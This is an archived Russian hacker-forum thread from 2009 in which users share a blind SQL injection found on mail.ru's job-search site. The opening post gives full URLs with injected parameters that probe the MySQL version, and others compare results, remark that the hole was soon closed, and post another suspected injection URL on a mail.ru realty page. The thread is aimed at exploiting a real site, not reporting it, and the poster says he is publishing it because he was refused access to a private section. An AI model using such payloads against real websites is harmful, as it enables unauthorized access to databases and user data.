PDA

Просмотр полной версии : баг на mail.ru


-m0rgan-
26.02.2009, 21:05
Вот нашол SQL injection на mail.ru
Crekm слепая, без вывода...
внимательно смотрим на формировку наги:
http://rabota.mail.ru/vac_search/?go=1&from_search=1&query=

http://rabota.mail.ru/vac_search/?go=1'&from_search=1&query=

смотрим версию мускула:
http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

пятая...

вроди как возможно внедрение SQL кода...

Дальше не докрутил, ибо не силён в подзапросах...

R1dex
26.02.2009, 21:21
Не знаю, какая там 5-ая...

У меня страница

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=5--&from_search=1&query=

и

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=4--&from_search=1&query=

одинаковые..

А вот так:

http://rabota.mail.ru/vac_search/?go=-1+and+substring(version(),1,1)=3--&from_search=1&query=

Другой результат...

-m0rgan-
26.02.2009, 21:25
у меня новости меняются.

-m0rgan-
26.02.2009, 21:27
да и не в версии дело, бага то есть...

R1dex
26.02.2009, 21:32
Ну, в случае с маилом, уже не особо удивляет блинд скуля.. Учитывая, что недавно была инъекция с выводом ^^

_==wolf==_
26.02.2009, 21:32
прикрыли о_О

R1dex
26.02.2009, 21:33
Ну да, я cразу зашёл и прикрыл ^^

_==wolf==_
26.02.2009, 21:34
да правда прикрыли!

-m0rgan-
26.02.2009, 21:48
Я это багу нашол недели 3 назад...

Ponchik
26.02.2009, 21:51
Смысл ложить такое в паблик =\

-m0rgan-
26.02.2009, 22:03
ну так в приват мну невзяли, приходица в паблике реализоваца)

CePry4oB
26.02.2009, 22:16
Смысл ложить такое в паблик =\
Был бы смысл вообще этой баги чтобы её в приват ложить ))

-m0rgan-
26.02.2009, 22:44
ну если грамотно раскрутьть, то смысл есть)

R1dex
27.02.2009, 09:59
ну если грамотно раскрутьть, то смысл есть)

Очень интересно, как ты будешь крутить 3-ию ветку подзапросами )

failed1
01.03.2009, 17:19
http://realty.mail.ru/msk/res/rflat/?page=-1